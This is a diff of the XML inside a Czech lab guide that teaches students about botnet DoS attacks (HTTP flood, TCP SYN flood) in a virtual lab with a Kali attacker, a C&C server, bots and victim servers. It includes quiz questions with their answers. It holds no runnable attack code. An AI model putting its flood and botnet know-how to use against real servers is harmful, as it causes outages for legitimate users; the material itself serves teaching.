+        <w:t>botnetem</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> na CnC server a scripty pro komunikaci s </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>botnetem</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>Na konci této práce by student měl mít větší porozumění o těchto útocích</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>:</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Na konci této práce by student měl mít větší porozumění o těchto útocích, jak jejich chování funguje a co </w:t>
+        <w:t xml:space="preserve"> jak jejich chování funguje a co </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -853,7 +1327,7 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc192000147"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc192341153"/>
       <w:r>
         <w:t>Potřebné materiály</w:t>
       </w:r>
@@ -882,15 +1356,16 @@
         <w:ind w:hanging="360"/>
       </w:pPr>
       <w:r>
-        <w:t>Software pro konfiguraci routeru (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WinBox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve">Místo pro virtuální stroje </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>~</w:t>
+      </w:r>
+      <w:r>
+        <w:t>50 GB.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -903,16 +1378,24 @@
         <w:ind w:hanging="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Místo pro virtuální stroje </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>~</w:t>
-      </w:r>
-      <w:r>
-        <w:t>50 GB.</w:t>
+        <w:t xml:space="preserve">Pro </w:t>
+      </w:r>
+      <w:r>
+        <w:t>přednášející</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – software</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> pro konfiguraci routeru (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WinBox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -925,7 +1408,26 @@
         <w:ind w:hanging="360"/>
       </w:pPr>
       <w:r>
-        <w:t>Obrazy Ubuntu server, Kali a RouterOS.</w:t>
+        <w:t xml:space="preserve">Pro </w:t>
+      </w:r>
+      <w:r>
+        <w:t>přednášející</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – o</w:t>
+      </w:r>
+      <w:r>
+        <w:t>brazy Ubuntu server, Kali a RouterOS.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="160" w:line="278" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="0"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:p>
@@ -938,25 +1440,640 @@
       <w:pPr>
         <w:pStyle w:val="Nadpis1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc192000148"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc192341154"/>
+      <w:r>
+        <w:t>Teoretické informace</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>V této části se seznámíte s použitými útoky (jek fungují a co obsahují.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc192341155"/>
+      <w:r>
+        <w:t xml:space="preserve">DOS typu HTTP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>flood</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="4"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">HTTP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>flood</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">cílí </w:t>
+      </w:r>
+      <w:r>
+        <w:t>na aplikační vrstvu (7. vrstva OSI modelu). Útočník využívá zdánlivě legitimní HTTP požadavky k přetížení cílového serveru a jeho vyčerpání. Tento typ útoku je obtížné detekovat, protože požadavky napodobují běžný provoz.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Princip útoku:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Útočník zasílá velké množství HTTP GET nebo POST požadavků na cílový server. Server je nucen zpracovávat každý požadavek, což vede k přetížení procesoru a paměti a následné nedostupnosti služby pro legitimní uživatele.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Veřejně p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>oužívané nástroje:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Mezi běžné nástroje patří HULK (HTTP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Unbearable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Load King), který generuje unikátní HTTP požadavky v nepravidelných intervalech, což činí útok obtížně filtrovatelným.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Dopad:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> HTTP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>lood</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> může dramaticky zvýšit odezvu serveru nebo jej zcela přetížit, což způsobuje výpadek poskytované služby.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Otázka </w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">1: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Jak ovlivňuje server</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> DoS útok</w:t>
+      </w:r>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(Zvýší se jeho odezva, nebo se útokem přetíží)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Otázka </w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2: Na jakém portu většinou běží webové služby?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>(port 80/443)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Otázka </w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>3: Jak</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ý</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">je například </w:t>
+      </w:r>
+      <w:r>
+        <w:t>znám</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ý</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(free)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> nástroj pro zachycení síťového provozu?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Wireshark</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Tcpdump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc192341156"/>
+      <w:r>
+        <w:t xml:space="preserve">DOS typu TCP SYN </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>flood</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="5"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">TCP SYN </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Flood</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> je protokolový útok, který zneužívá slabinu v procesu navazování spojení v síťovém protokolu TCP (tzv. „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>three-way</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>handshake</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>“). Tento útok operuje na transportní vrstvě (4. vrstva OSI modelu).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Princip útoku:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Útočník opakovaně zasílá SYN pakety cílovému serveru a simuluje tak požadavky na otevření spojení. Server odpovídá SYN-ACK paketem a čeká na potvrzení od útočníka (ACK), které však nikdy nepřijde. Tím zůstávají na serveru „polootevřené“ spojení, která zaplňují jeho kapacitu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Veřejně p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>oužívané nástroje:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Hping3 je oblíbený nástroj pro generování TCP SYN paketů, který umožňuje jejich přizpůsobení podle potřeb útočníka.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Dopad:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Server může být přetížený velkým množstvím polootevřených spojení, což omezuje jeho schopnost reagovat na legitimní uživatele. Výsledkem je nedostupnost služby a narušení provozu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Otázka </w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.4</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Na jaké vrstvě ISO/OSI běží TCP SYN </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>flood</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Na 4. vrstvě</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Otázka t.5: Jako útočník, posíláme poslední ACK?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Ne, abychom nechali spojení otevřené)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Otázka </w:t>
+      </w:r>
+      <w:r>
+        <w:t>t.6</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Co se stane v normálním „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>three</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>way</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>handshake</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">“ protokolu </w:t>
+      </w:r>
+      <w:r>
+        <w:t>po poslání značky</w:t>
+      </w:r>
+      <w:r>
+        <w:t> ACK, pokud ho další strana neo</w:t>
+      </w:r>
+      <w:r>
+        <w:t>bdrží?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Po vypršení </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>timeru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> se pošle ACK znova)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis1"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc192341157"/>
+      <w:r>
         <w:t>Instrukce</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Nadpis2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc192000149"/>
-      <w:r>
-        <w:t xml:space="preserve">Část 1. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Zavedení topologie</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc192341159"/>
+      <w:r>
+        <w:t xml:space="preserve">Část </w:t>
+      </w:r>
+      <w:r>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Popis topologie</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -984,7 +2101,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1006,147 +2123,255 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titulek"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Obrázek </w:t>
-      </w:r>
-      <w:fldSimple w:instr=" SEQ Obrázek \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>1</w:t>
-        </w:r>
-      </w:fldSimple>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Topologie</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> virtualizovaného prostředí</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Na Obrázku </w:t>
+      <w:r>
+        <w:t xml:space="preserve">Na </w:t>
+      </w:r>
+      <w:r>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:t>brázku</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> výše</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> je celá topologie </w:t>
+      </w:r>
+      <w:r>
+        <w:t>práce</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> i s přiřazenými IP adresami. V tomto zapojení tedy bude komponovat Útočník, na kterém běží distribuce Kali (dostupná z: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId13" w:anchor="kali-virtual-machines" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+          </w:rPr>
+          <w:t>https://www.kali.org/get-kali/#kali-virtual-machines</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>), ze kterého budou pramenit útoky.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Centralizovaný CnC (Command and Control) server, ke kterému Útočník má root přístup a ze kterého se budou přeposílat útoky botnetu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Boti, kteří reprezentují infikované zařízení s přístupem na internet a jsou tedy spouštěči škodlivého kódu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Tři routery s operačním systémem RouterOS (dostupný z: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+          </w:rPr>
+          <w:t>https://mikrotik.com/download</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a U</w:t>
+      </w:r>
+      <w:r>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:t>untu</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, mají simulovat internet a umožnit load </w:t>
+      </w:r>
+      <w:r>
+        <w:t>balancing,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> pokud je potřeba.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">A samotné servery oběti, na kterých běží HTTP služba Apache a DNS služba Bind na překlad adresy z druhého serveru. Jak </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Boti,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> tak servery běží převážně na </w:t>
+      </w:r>
+      <w:r>
+        <w:t>U</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">buntu (dostupný z: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId15" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+          </w:rPr>
+          <w:t>https://ubuntu.com/download/server</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Otázka 1.1:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Na základě topologie a jejích popiscích, jaký je maximální počet </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>botů</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> v botnetu, pokud </w:t>
+      </w:r>
+      <w:r>
+        <w:t>první bot dostane adresu 192.1.1.11?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Celkem jich může být 244, protože </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>256 – 2</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (adresa sítě a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>broadcast</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>) – 10 (prvních 10 použitelných adres pokud začínáme na 192.1.1.11))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc192341160"/>
+      <w:r>
+        <w:t xml:space="preserve">Část </w:t>
       </w:r>
       <w:r>
         <w:t>1</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> je celá topologie </w:t>
-      </w:r>
-      <w:r>
-        <w:t>práce</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> i s přiřazenými IP adresami. V tomto zapojení tedy bude komponovat Útočník, na kterém běží distribuce Kali (dostupná z: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId10" w:anchor="kali-virtual-machines" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hypertextovodkaz"/>
-          </w:rPr>
-          <w:t>https://www.kali.org/get-kali/#kali-virtual-machines</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>), ze kterého budou pramenit útoky.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Centralizovaný CnC (Command and Control) server, ke kterému Útočník má root přístup a ze kterého se budou přeposílat útoky botnetu.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Boti, kteří reprezentují infikované zařízení s přístupem na internet a jsou tedy spouštěči škodlivého kódu.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Tři routery s operačním systémem RouterOS (dostupný z: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId11" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hypertextovodkaz"/>
-          </w:rPr>
-          <w:t>https://mikrotik.com/download</w:t>
-        </w:r>
-      </w:hyperlink>
+        <w:t xml:space="preserve">,5. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Replikace</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> topologie (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Jen zajímavost</w:t>
+      </w:r>
       <w:r>
         <w:t>)</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ununtu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, mají simulovat internet a umožnit load </w:t>
-      </w:r>
-      <w:r>
-        <w:t>balancing,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> pokud je potřeba.</w:t>
-      </w:r>
